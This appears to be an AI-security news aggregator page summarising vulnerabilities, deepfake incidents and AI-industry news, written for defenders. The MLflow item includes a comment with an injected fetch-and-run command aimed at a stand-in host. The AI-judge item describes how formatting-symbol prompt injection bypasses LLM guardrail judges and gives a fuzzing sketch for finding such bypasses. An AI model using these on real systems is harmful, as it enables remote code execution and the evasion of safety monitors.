
Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by Truong (Jack) Luu, Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. AI Sec Watch was built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Total tracked: 2,657 · Last 24 hours: 7 · Last 7 days: 151
Daily Briefing: Monday, March 30, 2026

Anthropic's Leaked "Mythos" Model Raises Dual-Use Security Concerns: An unreleased Anthropic AI model called Mythos was accidentally exposed through a configuration error, revealing advanced reasoning and coding abilities specifically aimed at cybersecurity. The model's improved capability to find and exploit software vulnerabilities, plus its ability to autonomously fix its own code problems, could enable both more sophisticated cyberattacks and better defenses.


Mistral Secures $830M for European AI Data Center: French AI startup Mistral raised $830 million in debt financing to build a Paris-area data center with thousands of Nvidia GPUs (specialized chips used for AI training) to train its large language models, aiming for 200 MW of European computing capacity by 2027.

Latest Intel

01

Meta’s deepfake moderation isn’t good enough, says Oversight Board

safety, policy
Critical This Week: 5 issues

CVE-2025-15379 · NVD/CVE Database · Mar 30, 2026

Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where an attacker inserts malicious commands into input that gets executed) in its model serving container initialization code when deploying models with `env_manager=LOCAL`. The flaw allows attackers to execute arbitrary commands on deployment systems by inserting malicious content into the `python_env.yaml` file, which MLflow reads and uses in shell commands without validation. (CVE-2025-15379, Critical)
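To make the flaw class concrete, here is a minimal sketch, not MLflow's actual implementation: the file layout, field name, and `virtualenv` call are assumptions chosen only to illustrate how an attacker-controlled YAML value that reaches a shell string becomes command execution, and what a validated, shell-free alternative looks like.

```python
import subprocess

import yaml

def build_env_unsafe(python_env_path: str) -> None:
    """Illustrative anti-pattern: a YAML field flows into a shell command string."""
    with open(python_env_path) as f:
        env_spec = yaml.safe_load(f)
    # If env_spec["python"] is e.g. "3.10 && curl http://evil/x.sh | sh",
    # the injected command runs with the deployment service's privileges.
    subprocess.run(
        f"virtualenv --python={env_spec['python']} /tmp/model_env",
        shell=True, check=True,
    )

def build_env_safer(python_env_path: str) -> None:
    """Safer variant: validate the field and pass arguments without a shell."""
    with open(python_env_path) as f:
        env_spec = yaml.safe_load(f)
    version = str(env_spec.get("python", ""))
    if not all(part.isdigit() for part in version.split(".")):
        raise ValueError(f"unexpected python version string: {version!r}")
    subprocess.run(
        ["virtualenv", "--python", f"python{version}", "/tmp/model_env"],
        check=True,
    )
```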

Mar 10, 2026

Meta's Oversight Board (a semi-independent group that advises Meta on content moderation) found that Meta's methods for detecting deepfakes (AI-generated fake videos or images) are not strong enough to stop misinformation from spreading quickly during conflicts like the Iran war. The Board is calling on Meta to improve how it identifies and labels AI-generated content on Facebook, Instagram, and Threads.

The Verge (AI)
02

Auditing the Gatekeepers: Fuzzing "AI Judges" to Bypass Security Controls

security, research
Mar 10, 2026

Researchers discovered that AI judges (LLMs acting as automated security gatekeepers to enforce safety policies) can be manipulated through prompt injection (tricking an AI by hiding instructions in its input) using stealthy formatting symbols rather than obvious gibberish. They created a tool called AdvJudge-Zero, a fuzzer (software that finds vulnerabilities by testing with unexpected inputs), which automatically identifies innocent-looking character sequences that exploit the model's decision-making logic to bypass security controls.
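For intuition, here is a heavily simplified sketch of that fuzzing loop. It is not AdvJudge-Zero; the mutation alphabet is a guess at the "stealthy formatting symbols" described, and `judge_allows` is a hypothetical stand-in for whichever LLM-judge call a team actually uses.

```python
import random
from typing import Callable

# Innocent-looking formatting symbols of the kind described in the research:
# zero-width space, soft hyphen, list and markdown punctuation, tabs.
MUTATION_CHARS = ["\u200b", "\u00ad", "·", ">", "*", "~", "|", "\t"]

def mutate(text: str, rng: random.Random, n_edits: int = 3) -> str:
    """Insert a few formatting characters at random positions in the prompt."""
    chars = list(text)
    for _ in range(n_edits):
        pos = rng.randrange(len(chars) + 1)
        chars.insert(pos, rng.choice(MUTATION_CHARS))
    return "".join(chars)

def fuzz_judge(blocked_prompt: str,
               judge_allows: Callable[[str], bool],
               trials: int = 500,
               seed: int = 0) -> list[str]:
    """Return mutated variants that the judge lets through but should still block."""
    rng = random.Random(seed)
    bypasses = []
    for _ in range(trials):
        variant = mutate(blocked_prompt, rng)
        if judge_allows(variant):  # verdict flipped: a candidate guardrail bypass
            bypasses.append(variant)
    return bypasses
```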

Fix: Palo Alto Networks customers are better protected through Prisma AIRS and the Unit 42 AI Security Assessment service. Organizations concerned about potential compromise can contact the Unit 42 Incident Response team.

Palo Alto Unit 42
03

New ways to learn math and science in ChatGPT

industry
Mar 10, 2026

ChatGPT has introduced new interactive visual explanations for over 70 math and science concepts, allowing learners to manipulate variables and see real-time effects on graphs and outcomes instead of just reading static explanations. Research suggests that this type of interactive, visual learning helps students build stronger conceptual understanding compared to traditional instruction. The feature is now available globally to all ChatGPT users across all plans.

OpenAI Blog
04

OpenAI to acquire Promptfoo to strengthen AI agent security testing

security, industry
Mar 10, 2026

OpenAI is acquiring Promptfoo, a company that builds testing tools for AI applications, to improve security checks for AI agents (autonomous systems that operate independently in business processes) as more companies deploy them in production. Promptfoo's tools test AI models against adversarial prompts (malicious inputs designed to trick the AI), including prompt injection (hiding instructions in user input to manipulate the AI) and jailbreak attempts, and check whether models follow safety guidelines. The acquisition reflects growing enterprise concern about AI vulnerabilities and a shift toward treating AI security testing as an essential part of AI development, similar to traditional application security practices.

Fix: According to the source, the solution involves integrating Promptfoo's technology into OpenAI Frontier, OpenAI's platform for building and operating AI coworkers. The source also describes a 'shift-left approach' to AI testing, where security evaluation is integrated early in the development stage to simulate vulnerabilities, and continuous evaluation occurs during real-time monitoring and prompt execution. Additionally, enterprises are embedding AI evaluation platforms into DevSecOps workflows (development and security operations processes) so that models, prompts, and agent behaviors can be tested continuously before and after deployment.
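As a rough illustration of what that shift-left, continuously run evaluation can look like in a CI pipeline, here is a minimal pytest-style sketch. It does not use Promptfoo's or OpenAI Frontier's actual APIs; the corpus file, `call_agent` helper, and canary string are hypothetical placeholders.

```python
import json
import pathlib

import pytest

# Hypothetical adversarial corpus (prompt-injection and jailbreak strings)
# maintained by the security team and versioned next to the agent's code.
ATTACKS = json.loads(pathlib.Path("tests/adversarial_prompts.json").read_text())

CANARY = "INTERNAL-API-KEY-7f3a"  # planted secret that must never be echoed back

def call_agent(prompt: str) -> str:
    """Placeholder for the real agent invocation (HTTP request, SDK call, etc.)."""
    raise NotImplementedError

@pytest.mark.parametrize("attack", ATTACKS, ids=lambda a: a["id"])
def test_agent_resists_known_attacks(attack):
    """Fail the CI run if any known attack leaks the canary or a forbidden phrase."""
    reply = call_agent(attack["prompt"])
    assert CANARY not in reply
    assert not any(phrase in reply.lower() for phrase in attack["forbidden_phrases"])
```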

CSO Online
05

You Could Be Next

industry, policy
Mar 10, 2026

Katya, a freelance journalist turned content marketer, was recruited by Mercor to create training data for AI models by writing chatbot prompts and responses, work she initially enjoyed but which was abruptly canceled without warning. The article describes how machine learning (AI systems that improve by finding patterns in large amounts of data) relies on thousands of humans hired to generate and grade training examples, but gig workers like Katya face sudden project cancellations and job instability in this emerging industry.

The Verge (AI)
06

Nvidia plans open-source AI agent platform ‘NemoClaw’ for enterprises: Wired

industry
Mar 10, 2026

Nvidia is planning to launch NemoClaw, an open-source platform for AI agents (specialized AI tools that can reason, plan, and act independently on complex tasks) targeting enterprise companies like Salesforce and Google. The platform will allow these companies to deploy AI agents to perform work tasks and is expected to include security and privacy tools, with early access offered to partners who contribute to the project.

CNBC Technology
07

When AI safety constrains defenders more than attackers

security, safety
Mar 10, 2026

Enterprise AI systems deployed for security work are heavily restricted by safety guardrails (automated filters designed to prevent harmful outputs), while attackers freely use jailbroken models (AI systems with safety measures bypassed), open-source alternatives, and purpose-built malicious tools. This creates an asymmetry where defenders face routine refusals when requesting legitimate defensive content like phishing simulations or proof-of-concept code, while attackers can easily circumvent safety measures through prompt injection (tricking AI by hiding instructions in its input) and other well-documented techniques, giving them a significant operational advantage.

CSO Online
08

Overseas 'content farms' creating political deepfakes uncovered

safety, security
Mar 10, 2026

Overseas 'content farms' based in Vietnam are using AI to create fake videos and images of UK politicians, spreading them on Facebook to go viral and potentially earn money through the platform's monetization program. The fake content, called deepfakes (digitally altered videos, pictures, or audio made to look real), depicts politicians in false situations like hospital stays or compromising scenarios, and Meta has removed some pages after investigation, though new ones continue appearing daily.

Fix: The Electoral Commission is developing software to spot and combat deepfakes ahead of the Welsh and Scottish parliaments' elections in May. Additionally, Facebook has marked some false stories with warnings from third-party fact-checkers like Full Fact, and Meta removed several Vietnam-based pages after being contacted by the BBC.

BBC Technology
09

Security Tools for AI Infrastructure: A Buyer's Guide

security, industry
Mar 9, 2026

As generative AI (systems that create new content based on patterns in training data) becomes widespread across industries, organizations need specialized security tools to protect their AI infrastructure and data from cyber threats. AI Security Posture Management (AI-SPM) is a new category of security software designed to monitor, assess, and secure AI systems, complementing existing tools like CSPM (Cloud Security Posture Management, which protects cloud environments) and DSPM (Data Security Posture Management, which prevents data breaches).
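As a toy illustration of the kind of posture check such a tool automates, here is a short sketch; the inventory format, field names, and rules are invented for the example (the Langflow version floor loosely echoes CVE-2026-33873, tracked below) and do not reflect any vendor's actual product.

```python
from dataclasses import dataclass
from typing import Iterator

@dataclass
class AIAsset:
    name: str
    framework: str
    version: str
    internet_exposed: bool
    auth_required: bool

# Hypothetical inventory an AI-SPM scanner might assemble from cloud and CI/CD metadata.
INVENTORY = [
    AIAsset("fraud-model-serving", "mlflow", "2.9.0", internet_exposed=True, auth_required=False),
    AIAsset("support-agent-builder", "langflow", "1.8.3", internet_exposed=True, auth_required=True),
]

# Minimum patched versions, e.g. derived from a vulnerability feed
# (Langflow below 1.9.0 matches the CVE-2026-33873 entry below).
MIN_SAFE_VERSION = {"langflow": "1.9.0"}

def findings(assets: list[AIAsset]) -> Iterator[str]:
    for asset in assets:
        if asset.internet_exposed and not asset.auth_required:
            yield f"{asset.name}: internet-exposed endpoint without authentication"
        floor = MIN_SAFE_VERSION.get(asset.framework)
        if floor and tuple(map(int, asset.version.split("."))) < tuple(map(int, floor.split("."))):
            yield f"{asset.name}: {asset.framework} {asset.version} is below patched version {floor}"

for finding in findings(INVENTORY):
    print("FINDING:", finding)
```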

CSO Online
10

OpenAI and Google employees rush to Anthropic’s defense in DOD lawsuit

policy, industry
Mar 9, 2026

More than 30 employees from OpenAI and Google DeepMind filed a court statement supporting Anthropic in a lawsuit against the U.S. Defense Department, which labeled the AI company a supply-chain risk after Anthropic refused to let the Pentagon use its technology for mass surveillance or autonomous weapons. The employees argue that the Pentagon could have simply canceled its contract with Anthropic and purchased from another AI company instead of designating it as a supply-chain risk, a label typically reserved for foreign adversaries. They contend that if the government is allowed to punish Anthropic this way, it will harm U.S. competitiveness in AI and discourage open discussion about the risks of AI systems.

TechCrunch
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873 · NVD/CVE Database · Mar 27, 2026

critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO Online · Mar 27, 2026

critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521 · CISA Known Exploited Vulnerabilities · Mar 26, 2026

critical

CISA: New Langflow flaw actively exploited to hijack AI workflows

BleepingComputer · Mar 26, 2026